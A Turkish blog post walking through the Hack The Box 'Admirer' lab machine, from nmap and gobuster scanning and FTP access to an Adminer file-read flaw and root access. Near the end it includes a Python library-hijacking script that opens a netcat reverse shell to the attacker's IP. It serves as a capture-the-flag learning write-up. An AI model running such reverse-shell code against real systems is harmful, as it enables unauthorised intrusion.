• Oturum aç
Tech News, Magazine & Review WordPress Theme 2017
  • Haberler
  • Kategoriler
    • Bilim
    • Teknoloji
    • Girişimcilik
    • Kripto Para
    • Oyun
    • Yazılım
    • Otomotiv
    • Kültür Sanat
    • Tasarım
    • Savunma Sanayi
    • Siber Güvenlik
  • Etkinlikler
  • Mühendislikler
  • Mühendisin Köşesi
Sonuç yok
Tüm Sonuçları Görüntüle
MühendisBilir
Sonuç yok
Tüm Sonuçları Görüntüle

Hack The Box -Admirer MAKİNE ÇÖZÜMÜ

Saniye Nur Çintimur Saniye Nur Çintimur
10/11/2020
Okuma Zamanı: 6 dk.
678 7
2
Hack The Box -Admirer MAKİNE ÇÖZÜMÜ
Share on FacebookShare on Twitter

Merhaba, hadi çözüme geçelim.

İLGİLİ İÇERİKLER

Sadece Devletler’e Satışı Olan “Pegasus Casus Yazılımı” Nedir? Kimleri Hedef Alıyor?

Adli Otopsinin Ortaya Çıkmasını Sağlayan İlk Seri Katil: Jack

Yalnızca Davetle Girilebilen Sosyal Uygulama; CLUBHOUSE Hakkında Bilmeniz Gerekenler

Önce

nmap -Pn -A -T4 -p- 10.10.10.187

Nmap nedir ?

 Nmap, güvenlik açığı taraması ve ağ keşfi için ücretsiz, açık kaynaklı bir araçtır. Ağ yöneticileri Nmap’i sistemlerinde hangi cihazların çalıştığını belirlemek, mevcut ana makineleri ve sundukları hizmetleri keşfetmek, açık bağlantı noktaları bulmak ve güvenlik risklerini tespit etmek için kullanırlar.

Adminer nedir ?

Adminer PHP ile yazılmış tam özellikli bir veritabanı yönetim aracıdır.

PhpMyAdmin, Adminer tersine hedef sunucuya dağıtmak için hazır, tek bir dosya oluşur. Adminer MySQL, PostgreSQL, SQLite, MS SQL ve Oracle için kullanılabilir.

 

nmap taramamdan sonra bir dizin taraması yaptım ve robots.txt yi ziyaret etmem gerektiğini burada da gördüm:

Gobuster nedir ?

Gobuster aslında kaba kuvvet uygulamak için kullanılan bir araçtır:

  • Web sitelerindeki Url ler i listeler (dizinler ve dosyalar).
  • DNS alt alanlarını listeler .

 

Bu çıkan sayfaları kontrol ettiğimizde

Güzel credits elde ettik.Şimdi önce credential kısmında ftp bağlantıları gördüğüm için ftp ile bağlanmayı deniyorum , isterseniz terminalden yapın, isterseniz rahat arayüzü olan filezilla kullanın

FileZilla nedir ?

FileZilla, özetle özgür, açık kaynak ve çoklu platform destekli bir FTP istemcisidir.

Filezilla ile ftp bağlantımı sağladım.

Html.tar.gz içinde bulduklarımı inceliyorum

Adminer.php yi ziyaret ettiğimde ise mysql girişi geliyor, şimdi yukarıda buldugum bilgileri girip bağlantı sağlıyorum.

Bu kodu buldugum yer https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Hala gerçek şifreyi bulamadık (ssh bağlantısı için) , onu arıyoruz.Ve bunu çalıştırdıgımızda çalıştır ve sonra dışa aktar dediğimizde

Gerçek pass değerine ulaştık ve artık ssh ile bağlanabiliriz

Şimdi yetki yükseltmeye çalışalım :

sudo -l

özetle sudo haklarımızı listelemeye yarar.

Şimdi normalde burada herhangi bir işlem için rakamı girdiğimizde hata veriyordu, session hatası root olmadıgımız için, yetki yükselterek bunu aşacagız

 

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

Bu dökümandan faydalanarak şu betiği tmp dizinine ekliyorum ,

Nano ile ekleyebilirsiniz :

import os

def make_archive(a, b, c):

    os.system(‘nc 10.10.15.140  4444 -e “/bin/sh”‘)

( ip kısmına kendi ip nizi yazınız )

(fakat 4444 dinlemede olsun )

En son 6 yazın ve nc ile bağlanın :

İçeriklerden ilk siz haberdar olmak ister misiniz?

Abonlikten Çık
Saniye Nur Çintimur

Saniye Nur Çintimur

Adli Bilişim Mühendisi ,Siber Güvenlik Araştırmacısı, Offensive Security ilgili https://www.hackthebox.eu/home/users/profile/240523 https://tryhackme.com/p/sny @HackTheBox @PriviaHub @TryHackMe @CTFPlayer

İlişkili Gönderiler

Sadece Devletler’e Satışı Olan “Pegasus Casus Yazılımı” Nedir? Kimleri Hedef Alıyor?

Sadece Devletler’e Satışı Olan “Pegasus Casus Yazılımı” Nedir? Kimleri Hedef Alıyor?

22/07/2021
6.2k
Adli Otopsinin Ortaya Çıkmasını Sağlayan İlk Seri Katil: Jack

Adli Otopsinin Ortaya Çıkmasını Sağlayan İlk Seri Katil: Jack

15/02/2021
3.6k
yalnizca-davetle-girilebilen-sosyal-uygulama-clubhouse-hakkinda-bilmeniz-gerekenler

Yalnızca Davetle Girilebilen Sosyal Uygulama; CLUBHOUSE Hakkında Bilmeniz Gerekenler

09/02/2021
3.3k
spacexten-rekor-143-adet-uydu-firlatti-muhendisbilir

SpaceX’ten Rekor! 143 Adet Uydu Fırlattı

02/02/2021
2.1k
Tartışmaya katılmak için lütfenGiriş Yapın

Trend.

Bir Elektrik ve Elektronik Mühendisi Adayının Öğrenirse Kendine Katkı Sunacağı 10 Program

22/01/2021
137.3k
Güvenliğiniz İçin Kırılması Zor Şifre Önerileri

Güvenliğiniz İçin Kırılması Zor Şifre Önerileri

07/02/2021
437.4k

BTK Siber Güvenlik Uzmanlığı Sertifika Programı Online Sınav Soru ve Cevapları

15/11/2019
52.3k

Mühendisin Köşesi.

NASA’dan öğrencilere açık davet: “Gelin bizi hackleyin”

NASA’dan öğrencilere açık davet: “Gelin bizi hackleyin”

29/11/2020
2.9k

Tıp Mühendisliği Bölümü Nedir?

11/08/2020
3.3k
Çevre Mühendisliği Bölümü Nedir?

Çevre Mühendisliği Bölümü Nedir?

10/11/2020
6.9k
  • Gizlilik Politikası
  • Hakkımızda
  • Yazarlar
  • Yazarımız Ol
  • Sosyal Medya Sponsorluğu ve Partnerlik Programı
  • İletişim

© 2021 Muhendis Bilir - Powered by

Sonuç yok
Tüm Sonuçları Görüntüle
  • Haberler
  • Etkinlikler
  • Mühendislikler
  • Mühendisin Köşesi
  • Kategoriler
    • Bilim
    • Girişimcilik
    • Kültür Sanat
    • Otomotiv
    • Savunma Sanayi
    • Siber Güvenlik
    • Tasarım
    • Teknoloji
  • Sosyal Medya Sponsorluğu ve Partnerlik Programı
  • Yazarımız Ol
  • Oturum aç

© 2021 Muhendis Bilir - Powered by

Tekrar hoşgeldiniz!

Google ile giriş yap
Veya

Hesaba giriş yap

Şifremi unuttum

Yeni hesap oluştur

Sign Up with Google
Veya

Kayıt olmak için formu doldurun

Tüm Alanlar Zorunludur Oturum aç

Şifrenizi Geri Alın

Şifreyi sıfırlamak için ayrıntı girin

Oturum aç

Yeni Oynatma Listesi Ekle

Veri politikasındaki amaçlarla sınırlı ve mevzuata uygun şekilde çerez konumlandırmaktayız. Detaylar için Gizlilik Politika'mızı inceleyebilirsiniz. .